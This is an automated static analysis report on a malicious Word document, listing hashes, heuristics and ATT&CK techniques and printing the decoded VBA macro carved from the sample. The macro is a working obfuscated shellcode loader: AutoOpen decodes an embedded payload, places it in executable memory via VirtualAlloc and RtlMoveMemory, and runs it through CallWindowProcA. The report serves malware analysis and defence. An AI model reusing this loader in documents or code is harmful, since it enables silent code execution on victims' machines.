Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c63f7b0050891ca1…

MALICIOUS

Office (OLE)

Size: 286.5 KB
Created: 2016-08-15 14:16:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: ae11b66cd1d25c77a0a0e368b5726f00
SHA-1: 24657ed56c47ffa15102d638e0ff5290b82406a1
SHA-256: c63f7b0050891ca19b26156f31091c36beb020dc24fa4c3e3126d7baf809eadf
Risk Score: 188

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. The presence of VirtualAlloc API calls and an AutoOpen macro indicates that the document is designed to run malicious code, likely to download and execute a secondary payload. VBA macros are present and appear to be part of the execution chain.

Heuristics (6)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical | CVE likely | CVE_2007_3899]
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Downloader.Bendis-6744751-0 [critical | CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Bendis-6744751-0
  • Reference to VirtualAlloc API [medium | SC_STR_VIRTUALALLOC]
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker [medium | OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected [medium | 1 related finding | OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro [low | OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script:
      #End If
      Sub AutoOpen()
      #If Win64 Then

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7802 bytes
SHA-256: 3a00bbeaf7b26596ae63b57f3feadf54f6bd91aef1193f0e9f269d47618c9dc2

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function veery Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Function livy Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
Private Declare PtrSafe Function parliamentary Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
Private Declare PtrSafe Function pierching Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Private Declare PtrSafe Sub beau Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function eponym Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Private Declare PtrSafe Function inaudibly Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr

#Else
Private Declare Function payena Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Private Declare Function genus Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long
Private Declare Function veery Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function myxocephalus Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long
Private Declare Function moraine Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
Private Declare Function parliamentary Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Sub beau Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

#End If
Sub AutoOpen()
#If Win64 Then
tribes
#ElseIf Win32 Then
pachycephalosaur = "alveolitis"
tribes
#Else
#End If
End Sub
Sub InsertSymbolMethod()
   Dim MyRange As Object
   Set MyRange = ActiveDocument.Range
   ' Selection Example:
   Selection.InsertSymbol CharacterNumber:=171, _
      Font:="Symbol", Unicode:=False
   ' Range Example:
   MyRange.Collapse Direction:=wdCollapseStart
   MyRange.InsertSymbol CharacterNumber:=171, _
      Font:="Symbol", Unicode:=False
End Sub

Sub tribes()
Dim apex As Variant
Dim cutlassfish As String
carposporic = perstringe.lubricitate
concessive = dibatter.avowal(carposporic)
niobrara = 6 - 3
Select Case niobrara
Case 1 To 5
megadeath = "monosyllable"
earsplitting = LCase("bu") + Mid("ficaccansubsequence", 5, 4) + StrReverse("rei")
Case 6
catacala = catacala * 4
Case 9
companionship = "deafanddumb"
bulbaceous = "deepen"
End Select

tenter = "spatterdash"
#If Win64 Then
Dim absorption As LongPtr
#Else
Dim absorption As Long
#End If
messianic = 0
absorption = veery(messianic, 4067, &H1000, &H40)
brotula = "uturn"
Dim actor As String
buttony = "hoheria"
leftish = "slim"
actor = ActiveDocument.FullName
For naming = 38 To 50
cementation = 50
cinerary = "extracting"
crabbe = StrReverse("raf") + Left("kleberryearthflax", 8)
crabbe = StrReverse("cxe") + StrReverse("tatigo") + LCase("IOn")
Next naming

Dim fertilizer() As Byte
fertilizer = concessive
attrition = "gallop"
beau ByVal absorption, fertilizer(0), UBound(fertilizer) + 1
abranchiate = "incautious"
#If Win64 Then
Dim seasonally As Long
clearage = "decent"
anathema = Mid("indigenousgrahighmindedness", 11, 3) & Mid("emergingndchidisarrange", 9, 5) & UCase("lD")
uncrannied = "peripheral"
collate = 576
#ElseIf Win32 Then
collate = 2214
#End If
Dim afterwards As Byte
Dim mithraist As Long
preclude = parliamentary(ByVal absorption + collate, actor, 0, 0, 0)
coparceny = 96
magnas = 89
If coparceny + magnas < 47 Then
coparceny = "fu" & "lcru" & Right("shikokum", 1)
autographed = Left("clocatmint", 3) + StrReverse("cuotdu") + StrReverse("gnih")
Else
magnas = 56
End If

End Sub



Attribute VB_Name = "dibatter"
Function avowal(horrified) As String
Dim kenaf(255) As Byte
Dim billhook() As Byte
Dim hemophiliac As Long
Dim bagatelle(63) As Long
Dim needle(63) As Long
Dim heavenborn As Integer
Dim breakfast(63) As Long
Dim tough As Long
Dim embonpoint As String
cinerary = "cytosine"

Dim countercharm() As Byte
Dim visavis As Long
nefariousness = "automaton"

Dim reclaimed As Long
handclap = 258048
burhinidae = 13 - 43 + 65566
apartments = 256
innovate = 33 - 35 + 66
churchdom = 85 + 36 - 66 + 4041
molehill = 4032
future = 262144
muesli = 71 + 16711609
convocation = 89 + 59 - 108 + 23
clanking = 47 + 65233
perceptibility = 60 - 108 + 14 + 289
rigatoni = 119 - 7 + 16514960
Dim agential As Byte
Dim glossitis() As Byte
ReDim glossitis(Len(horrified) - 1)
For i = 1 To Len(horrified)
glossitis(i - 1) = CByte(Asc(Mid(horrified, i, 1)))
Next
Dim grpou As Long
For anthropomorphic = 39 To 62
livable = 62
cinerary = nefariousness
archaeornithes = Mid("xerographycobarway", 11, 2) & LCase("NvEn") & "ient"
archaeornithes = LCase("mIcRO") + Right("snakebitepaleont", 7) + StrReverse("ygolo")
Next anthropomorphic

heavenborn = 0
pholidae = 24 + 98
dense = 2 - 8 + 261
For hemophiliac = 0 To dense
Select Case hemophiliac
Case 65 To 90
kenaf(hemophiliac) = hemophiliac - 65
Case 97 To pholidae
kenaf(hemophiliac) = hemophiliac - 71
Case 48 To 57
kenaf(hemophiliac) = hemophiliac + 4
Case 43
kenaf(hemophiliac) = 62
Case 47
kenaf(hemophiliac) = 63
End Select
Next hemophiliac
For hemophiliac = 0 To 63
breakfast(hemophiliac) = hemophiliac * innovate
needle(hemophiliac) = hemophiliac * churchdom
bagatelle(hemophiliac) = hemophiliac * future
Next hemophiliac
countercharm = glossitis
sow = 4
ReDim billhook((((UBound(countercharm) + 1) \ sow) * 3) - 1)
For tough = 0 To UBound(countercharm) Step 4
cannibalistic = countercharm(tough)
exacting = 3
visavis = bagatelle(kenaf(cannibalistic)) + needle(kenaf(countercharm(tough + 1))) + _
breakfast(kenaf(countercharm(tough + 2))) + kenaf(countercharm(tough + exacting))
hemophiliac = visavis And muesli
billhook(reclaimed) = hemophiliac \ burhinidae
hemophiliac = visavis And clanking
billhook(reclaimed + 1) = hemophiliac \ apartments
billhook(reclaimed + 2) = visavis And perceptibility
reclaimed = reclaimed + 3
Next tough
avowal = billhook
End Function

Sub PasteMethod()
   Dim MyRange As Object
   Set MyRange = Selection.Range
   ' Selection Example:
   Selection.Paste
   ' Range Example:
   MyRange.Collapse Direction:=wdCollapseStart
   MyRange.Paste
End Sub



Attribute VB_Name = "perstringe"
Attribute VB_Base = "0{1F612FAD-FA4C-4F31-9E66-B1BD10DFC9E3}{65B0A119-9317-4279-89BF-4B412EA6B07D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{2BFDCFCA-2681-4A0B-B31A-F3B63CDA4DE3}{51983526-3DDA-4EBF-9A87-D6F2F51942A2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False